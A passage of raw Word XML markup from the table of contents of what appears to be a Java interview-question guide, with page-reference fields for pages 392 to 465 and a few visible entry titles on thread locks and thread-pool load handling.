            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>392</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EDBC025" w14:textId="59B27F5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7867487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>394</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F670F19" w14:textId="4E267F1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7867488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>396</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FBB331B" w14:textId="43F3D70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7867489 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>399</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BA48AEC" w14:textId="54D4D00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7867490 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>401</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="627239BA" w14:textId="55B7314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lass level lock and Object level lock?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867491 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="531D8509" w14:textId="2986693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7867492 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E859CC3" w14:textId="4E89F1F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7867493 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56DBAD4B" w14:textId="4340BCC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7867494 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>406</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="449408E3" w14:textId="5B10E0C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7867495 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>408</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E25C2DB" w14:textId="70C97B2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7867496 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>410</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09B135F6" w14:textId="2592821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7867497 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>413</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E6FCF25" w14:textId="215623C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7867498 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>415</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="526AA1CC" w14:textId="16DC54A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4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7867499 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>417</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FCDE38D" w14:textId="0A7DD4A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7867500 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>421</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="789F8D42" w14:textId="5E22D51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7867501 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>423</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BFB128B" w14:textId="666C4E2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7867502 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>426</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A0311D3" w14:textId="3528B52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7867503 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>428</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32CF8F63" w14:textId="71C59D5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7867504 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>430</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FBCAA98" w14:textId="1C53216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7867505 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>431</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63E97D0E" w14:textId="462A8DD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7867506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>432</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F6F7B40" w14:textId="3E75553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7867507 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>434</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D7EEB6" w14:textId="39513BF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7867508 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70ED9940" w14:textId="5EA9CE2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7867509 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>437</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="661D23FC" w14:textId="033789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7867510 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>438</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06FA5E94" w14:textId="5E92DE1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7867511 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>440</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E0B1A0C" w14:textId="483CBE4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7867512 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>442</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AF326BD" w14:textId="274B39E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7867513 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D21D51B" w14:textId="4DA199F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7867514 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>445</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15F972B5" w14:textId="653BD8D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7867515 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>447</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DB25403" w14:textId="63E2A21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7867516 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>449</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D4DAACA" w14:textId="00251E0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7867517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>452</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="079DEDF7" w14:textId="455430D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7867518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>454</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50BEC365" w14:textId="004C9A2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7867519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>456</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="415AC90A" w14:textId="4E9D6C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7867520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>457</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52DF6C2F" w14:textId="01C1E4A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7867521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>458</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="604621F6" w14:textId="131DED4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7867522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>459</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D91C0DE" w14:textId="49AAF5C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7867523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BA0F111" w14:textId="0932683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7867524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="484D1315" w14:textId="244EDD3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7867525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FE1FAC6" w14:textId="3DDC19A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7867526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>464</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B5E5838" w14:textId="3243DD7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create a thread pool of 100 threads and receive 1000 TPS (transactions per second) to your API, how would you handle the load?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
